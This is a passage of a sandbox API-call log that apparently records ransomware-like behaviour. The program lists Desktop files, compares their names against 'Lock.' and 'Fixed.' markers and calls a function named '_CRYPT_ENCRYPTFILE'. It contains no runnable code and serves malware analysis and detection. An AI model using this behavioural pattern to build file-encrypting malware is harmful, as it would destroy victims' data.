ftLastWriteTime.dwLowDateTime=0xc281a560, ftLastWriteTime.dwHighDateTime=0x1d5f0de, nFileSizeHigh=0x0, nFileSizeLow=0xcdd9, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="Z3NyFrC6_WxtuHo-dMOg.ots", cAlternateFileName="Z3NYFR~1.OTS")) returned 0 [0215.551] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0215.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0215.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0215.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0215.552] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0215.552] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0215.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0215.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0215.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0215.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0215.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.567] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0215.567] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0215.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x2e563a8 [0215.568] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/Z3NyFrC6_WxtuHo-dMOg.ots", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\Z3NyFrC6_WxtuHo-dMOg.ots", lpFilePart=0x8cf650*="Z3NyFrC6_WxtuHo-dMOg.ots") returned 0x30 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0215.568] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\Z3NyFrC6_WxtuHo-dMOg.ots" (normalized: "c:\\users\\fd1hvy\\desktop\\z3nyfrc6_wxtuho-dmog.ots")) returned 0xffffffff [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0215.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.568] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0215.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.568] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0215.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0215.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.569] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsyajCuqv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="syajCuqv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yajCuqv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ajCuqv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jCuqv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cuqv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uqv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qv92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="92xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.569] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xTr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tr5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="whyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hyk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yk.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0215.570] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k.bmp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0215.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0215.570] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0215.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0215.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0215.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0215.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0215.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0215.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsyajCuqv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="syajCuqv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yajCuqv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ajCuqv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jCuqv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Cuqv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uqv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qv92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="92xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xTr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Tr5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.571] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0215.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="whyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hyk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.572] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yk.bmp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0215.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0215.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0215.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0215.572] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0215.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0215.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0215.572] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0215.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c38 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0215.573] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0215.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0215.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cc8 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0215.574] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd50 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0215.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd50 | out: hHeap=0x970000) returned 1 [0215.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0215.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0215.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0215.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0215.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0215.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0215.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53860 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0215.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0215.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0215.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0215.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0215.576] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 